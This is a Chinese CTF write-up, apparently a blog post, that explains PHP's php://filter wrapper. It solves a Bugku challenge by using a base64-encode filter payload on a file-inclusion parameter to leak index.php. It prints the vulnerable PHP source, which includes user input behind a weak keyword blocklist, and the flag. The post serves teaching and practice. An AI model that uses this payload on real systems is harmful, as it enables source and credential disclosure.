通过php_filter获取flag

php://filter

php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。 这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、 file() 和 file_get_contents(), 在数据流内容读取之前没有机会应用其他过滤器。

名称描述
resource=<要过滤的数据流>这个参数是必须的。它指定了你要筛选过滤的数据流。
read=<读链的筛选列表>该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔。
write=<写链的筛选列表>该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔。
<;两个链的筛选列表>任何没有以 read= 或 write= 作前缀 的筛选器列表会视情况应用于读或写链。

使用BASE64获取源码

使用bugku平台的一道题目

访问题目环境

环境地址

  • 点击click me?no,页面跳转到test5,但是地址栏得链接却变成了http://123.206.87.240:8005/post/index.php?file=show.php

  • 因为题目说flag在index中,所以尝试使用php://filter构造payload:php://filter/read=convert.base64-encode/resource=index.php

  • 将得到的数据进行BASE64解码

<html>
    <title>Bugku-ctf</title>
    
<?php
	error_reporting(0);
	if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
	$file=$_GET['file'];
	if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
		echo "Oh no!";
		exit();
	}
	include($file); 
//flag:flag{edulcni_elif_lacol_si_siht}
?>
</html>
  • 得到flagflag:flag{edulcni_elif_lacol_si_siht}
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值